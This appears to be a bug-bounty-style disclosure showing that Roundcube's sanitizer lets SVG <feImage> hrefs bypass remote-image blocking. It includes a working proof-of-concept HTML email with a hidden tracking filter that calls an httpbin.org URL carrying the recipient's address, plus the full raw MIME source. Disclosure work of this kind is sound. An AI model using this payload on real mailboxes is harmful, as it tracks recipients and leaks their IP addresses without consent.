SVG filter primitives bypass remote image blocking, enabling email tracking without consent.

## Summary: When `allow_remote` is set to `false`, Roundcube's HTML sanitizer [https://github.com/roundcube/roundcubemail/blob/5162a0d9d7b05728500375611a2fb4fc55844c7c/program/lib/Roundcube/rcube_washtml.php](rcube_washtml) blocks external resources in `<img>`, `<image>`, and `<use>` tags by checking their src/href attributes through `is_image_attribute()`. However, the `<feImage>` SVG filter primitive is allowlisted as an element but its href attribute is not recognized as an image source. Instead, it passes through `wash_link()` which permits external HTTP/HTTPS URLs. ## Steps To Reproduce: Step 1: Send an HTML e-mail with embedded SVG ``` <!DOCTYPE html> <html> <head><title>Important Document</title></head> <body> <h1>Important Information</h1> <p>Dear valued customer,</p> <p>Please review the attached information carefully.</p> <svg width="1" height="1" style="position:absolute;left:-9999px;"> <defs> <filter id="t"> <feImage href="https://httpbin.org/image/[email protected]" width="1" height="1"/> </filter> </defs> <rect filter="url(#t)" width="1" height="1"/> </svg> <p>Best regards,<br>Totally Legitimate Company</p> </body> </html> ``` Step 2: See HTTP request made to `https://httpbin.org/image/[email protected]` when the e-mail is opened ## Supporting Material/References: {F5185346} ### Show Source ``` Return-Path: <[email protected]> Received: from xxx Content-Type: multipart/alternative; boundary="===============5782437078710662677==" MIME-Version: 1.0 Subject: Important: Please Review This Document From: [email protected] To: [email protected] --===============5782437078710662677== Content-Type: text/plain; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Please enable HTML to view this message. --===============5782437078710662677== Content-Type: text/html; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit <!DOCTYPE html> <html> <head><title>Important Document</title></head> <body> <h1>Important Information</h1> <p>Dear valued customer,</p> <p>Please review the attached information carefully.</p> <svg width="1" height="1" style="position:absolute;left:-9999px;"> <defs> <filter id="t"> <feImage href="https://httpbin.org/image/[email protected]" width="1" height="1"/> </filter> </defs> <rect filter="url(#t)" width="1" height="1"/> </svg> <p>Best regards,<br>Totally Legitimate Company</p> </body> </html> --===============5782437078710662677==-- ``` ## Impact Attackers can embed invisible tracking pixels in emails that load even when "Block remote images" is enabled, allowing: 1. Email open tracking / read receipts without consent 2. IP address disclosure (Geolocation inference) 3. User agent fingerprinting